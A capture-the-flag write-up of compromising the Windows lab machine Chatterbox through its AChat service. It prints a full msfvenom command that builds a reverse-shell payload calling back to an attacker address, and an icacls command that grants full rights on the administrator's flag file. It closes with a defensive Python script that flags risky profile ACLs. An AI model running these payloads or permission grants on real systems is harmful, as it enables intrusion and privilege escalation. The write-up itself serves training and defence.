Chatterbox is a retired Windows machine; the goal is to obtain the user and root flags by exploiting its vulnerabilities.
We start with an nmap scan to identify the target machine.
Classic Scan
Full port Scan
The port scan shows many open ports. We enumerated the well-known ports first, starting with SMB, but got no results there. The other ports did not give us an entry point either. The ports 9255 and 9256 that showed up in the full scan stand out (consecutive port numbers).
Let's run a detailed version and service scan against these.
We see that the "AChat chat system httpd" service is running, so we make a request to it.
Let's search for exploits related to it.
We found this related exploit; we download it and look at its contents.
This exploit code runs calc.exe.
Let’s try to edit and run this code.
I think it worked, but we can't tell because we can't see it 🙂 Let's generate a reverse shell payload with msfvenom.
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=4747 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
With this command we generated the buf, and now we use it as the payload in the exploit code.
Then we edited the exploit code and ran it.
We obtained a shell as the user chatterbox\alfred.
And this is how we got the user flag.
Interestingly, we could list the Administrator user's files and folders, but we couldn't read them.
Let's check the permissions right here.
Here we see that we have permissions on the Desktop directory, but we do not have permission to read root.txt.
Now let's query the permissions here and then grant access to the Alfred user.
icacls Desktop -> query permissions
icacls root.txt /grant Alfred:(F) -> grant permissions
This way we were able to read the root flag.
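The weakness exploited in the last step is an ACL on another user's profile directory that gives a low-privileged account write-level rights. As an added example (not part of the original writeup, and not output captured from the machine), the following Python script parses the text that icacls prints for a path and flags any ACE inside a C:\Users\<owner>\ tree that grants full, modify, write, write-DACL or take-ownership rights to an account other than the profile owner, SYSTEM or Administrators. The two icacls outputs embedded below are constructed samples in icacls' format; the principal names follow the writeup, but the exact ACEs are assumed for illustration.

```python
import re
from typing import List, Tuple

# Rights that let a principal alter a file's content or its ACL.
# F = full control, M = modify, W = write, WDAC = write DACL, WO = take ownership.
ESCALATION_RIGHTS = {"F", "M", "W", "WDAC", "WO"}

# Accounts expected to hold full control over every user profile.
TRUSTED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators"}

# Extracts the profile owner from a path such as C:\Users\Administrator\Desktop
PROFILE_RE = re.compile(r"^[A-Za-z]:\\Users\\([^\\]+)", re.IGNORECASE)


def parse_icacls(path: str, output: str) -> List[Tuple[str, List[str]]]:
    """Parse the text `icacls <path>` prints into [(principal, [right, ...]), ...].

    icacls prints the path and the first ACE on one line and each further ACE
    indented on its own line. The caller passes the path it queried so the
    first line can be split reliably even for principals containing spaces
    (e.g. NT AUTHORITY\\SYSTEM). Blank lines and the summary line are skipped.
    """
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.startswith(path + " "):
            line = line[len(path) + 1:]
        principal, _, flags = line.partition(":")
        rights = []
        # Each parenthesised group holds either one simple right (F, M, RX, ...),
        # an inheritance flag (OI, CI, I, ...) or a comma-separated list of
        # specific rights (DE,WDAC,WO,...).
        for group in re.findall(r"\(([^)]*)\)", flags):
            rights.extend(t.strip() for t in group.split(","))
        aces.append((principal, rights))
    return aces


def find_risky_aces(path: str, aces: List[Tuple[str, List[str]]]) -> List[Tuple[str, List[str]]]:
    """Return the ACEs on a path inside a user profile that grant write-level or
    ACL-changing rights to an account other than the profile owner, SYSTEM or
    Administrators. Such an ACE is what lets a different user re-grant
    permissions on files beneath that directory."""
    m = PROFILE_RE.match(path)
    if not m:
        return []  # not inside a profile directory; nothing to judge here
    owner = m.group(1).lower()
    risky = []
    for principal, rights in aces:
        if principal in TRUSTED:
            continue
        account = principal.rsplit("\\", 1)[-1].lower()
        if account == owner:
            continue
        if ESCALATION_RIGHTS & set(rights):
            risky.append((principal, rights))
    return risky


# Constructed sample: the Desktop directory grants full control to a second local user.
DESKTOP_PATH = r"C:\Users\Administrator\Desktop"
DESKTOP_OUTPUT = "\n".join([
    r"C:\Users\Administrator\Desktop CHATTERBOX\Alfred:(OI)(CI)(F)",
    r"                               NT AUTHORITY\SYSTEM:(OI)(CI)(F)",
    r"                               BUILTIN\Administrators:(OI)(CI)(F)",
    r"                               CHATTERBOX\Administrator:(OI)(CI)(F)",
    "",
    "Successfully processed 1 files; Failed processing 0 files",
])

# Constructed sample: a file whose ACL lists only the owner and trusted accounts.
ROOT_PATH = r"C:\Users\Administrator\Desktop\root.txt"
ROOT_OUTPUT = "\n".join([
    r"C:\Users\Administrator\Desktop\root.txt NT AUTHORITY\SYSTEM:(F)",
    r"                                        BUILTIN\Administrators:(F)",
    r"                                        CHATTERBOX\Administrator:(F)",
    "",
    "Successfully processed 1 files; Failed processing 0 files",
])


if __name__ == "__main__":
    for path, output in ((DESKTOP_PATH, DESKTOP_OUTPUT), (ROOT_PATH, ROOT_OUTPUT)):
        findings = find_risky_aces(path, parse_icacls(path, output))
        status = "RISKY" if findings else "ok"
        print(f"{status:5} {path}")
        for principal, rights in findings:
            print(f"      {principal}: {','.join(rights)}")
```

On a real host the output strings would come from running icacls against each profile directory; the script then reports the Desktop directory as risky because a non-owner account holds (F), which is precisely the condition that allowed the permission change in the final step, while the file that lists only the owner and the trusted accounts passes.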